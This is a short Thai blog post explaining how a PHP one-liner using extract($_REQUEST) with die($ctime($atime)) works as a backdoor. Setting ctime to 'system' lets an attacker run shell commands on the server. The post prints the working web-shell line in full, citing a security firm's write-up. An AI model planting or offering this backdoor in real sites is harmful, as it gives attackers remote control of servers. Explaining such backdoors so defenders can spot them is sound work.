วันพฤหัสบดีที่ 27 กุมภาพันธ์ พ.ศ. 2557
ช่องโหว่ RCE ในฟังชั่น Extract PHP
จากบทความ ช่องโหว่ extract function ที่เรียกใช้ Commend ใน Function PHP จะเห็นบ่อยๆใน code ของ developer ในสมัย PHP 4.x
จากโค้ด
<?php @extract ($_REQUEST); @die ($ctime($atime)); ?>
extract จะเหมือนกับว่า ไปดึง $_REQUEST มาใช้ ซึ่ง $_REQUEST นี่ เป็นตัวแปรที่สร้างขึ้นไว้ในไฟล์ PHP หรือภาษา Script อื่นๆ ที่มีการสร้างขึ้นมาเพื่อใช้ ในการรับค่าของตัวแปร method หรือวิธีการที่ใช้ส่งข้อมูลทั้งสองแบบ คือ GET และ POST โดย $_REQUEST จะสามารถเข้าถึงค่าข้อมูลได้โดยไม่จำเป็นต้องระบุว่าเป็น method เท่านั้น
และ die เป็นฟังชั่นใน PHP ที่สามารถเขียนอะไรลงไปก็ได้
ดูจากภาพด้านล่าง
ตัวแปร $ctime และ $atime หาก ctime เป็น system แล้ว atime เป็น คำสั่ง Command ก็จะสามารถเรียกใช้ Command line หรือ CMD ได้
สรุป Hacker จะสามารถทำ remote command execution ได้ ตุบตั๊บ เซิฟเวอร์โดน แฮค
บทความ extract function PHP : http://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html
เครดิต : https://www.facebook.com/notes/tawan-naultang/php-backdoors-extract-function/512875195453293
ป้ายกำกับ:
กลโกง Hacker Web,
แฮกเว็บ,
Hack,
Hack Web,
Index,
PHP เบื้องต้น,
script,
Web